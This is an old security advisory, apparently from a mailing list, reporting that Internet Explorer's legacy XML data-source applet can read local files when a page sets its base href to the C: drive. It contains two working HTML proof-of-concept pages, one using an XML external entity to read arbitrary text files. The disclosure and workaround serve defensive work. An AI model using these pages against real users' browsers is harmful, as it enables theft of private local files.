Internet explorer can read local files

["Jelmer" <jelmer () kuperus xs4all nl>]

      .---.        .----------
     /     \  __  /    ------
    / /     \(  )/    -----
   //////   ' \/ `   ---
  //// / // :    : ---
 // /   /  /`    '--
//          //..\\
       ====UU====UU====
           '//||\\`   b


Description :

There is a bug in internet explorer which allows reading and sending of
local files.
The problem lies in a legacy XML Datasource applet shipped with internet
explorer since its 4.0 release

it is used in a page like this

<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso"
MAYSCRIPT="true">

</applet>

as you can see you dont specify a jar or cab file where the class is loaded
from, apperently it is added to the classpath
from a local file.
It gets nasty when you add a <base href="file:///C:/"> tag to the head
section, the applet now thinks it's codebase is local
and you are allowed to read local xml files
So this snippet will read c:\jelmer.xml

<html>
<head>
 <base href="file:///C:/">
</head>
<body>
 <applet code="com.ms.xml.dso.XMLDSO.class" width=100% height=50 id="xmldso"
MAYSCRIPT="true">
  <PARAM NAME="url" VALUE="jelmer.xml">
 </applet>
 <script language="javascript">
  setTimeout("showIt()",2000);
  function showIt() {
   var jelmer = xmldso.getDocument();
   alert(jelmer.Text);
  }
 </script>
</body>
</html>

reading local xml files is bad enough but there is more that can be done
xml has a feature called external entities wich allows you to combine
multiple files as one big file
This allows us to read text files aswell as shown by the following example :

<html>
<head>
 <base href="file:///C:/">
</head>
<body>
 <applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso"
MAYSCRIPT="true">
  <?xml version="1.0"?>
  <!DOCTYPE file  [
    <!ELEMENT file (#PCDATA) >
    <!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
  ]>
  <file>
  &contents;
  </file>
 </applet>
 <script language="javascript">
  setTimeout("showIt()",2000);
  function showIt() {
   var jelmer = xmldso.getDocument();
   alert(jelmer.Text);
  }
 </script>
</body>
</html>


Systems affected :

The exploit has been confirmed to work on Windows 2000 and windows XP both
fully patched.
However I believe it will work on any IE browser since the 4.0 release

example :

A Demonstration of the issue described is available at :

http://www.xs4all.nl/~jkuperus/msieread.htm

It reads and displays the contents of c:\jelmer.txt

Vendor status :

Microsoft was notified 2 days ago, I have yet to recieve a reply.
I really don't care to wait any longer The fact that I am still a bit
disgruntaled that they didn't have the
decentsy to reply to the microsoft help bufferoverflow issue I reported to
them (wich is exploitable) may have influenced
my patience a little. Thats trustwothy computing for you, they spend 100's
of millions on making microsoft products more secure
yet where reporting vulnerabilities to them, as drew copely put it

"One would think there was one guy doing it all and this
guy isn't coming into work."

Workaround :

Disable java all together or install the sun jdk it does not seem affected

references :

http://www.webdeveloper.com/html/html_xml_3.html

previous vulnerablilities :

"Macromedia flash! local file reading"
  http://online.securityfocus.com/archive/1/286625

"Winamp allows execution of arbitrary code"
  http://online.securityfocus.com/archive/1/283018

"ICQ allows execution of arbitrary code"
  http://online.securityfocus.com/archive/1/282631

"Windows media player allows execution of arbitrary code"
  http://online.securityfocus.com/bid/5107

"MS XMLHTTP component allows local file reading"
  http://online.securityfocus.com/archive/1/245687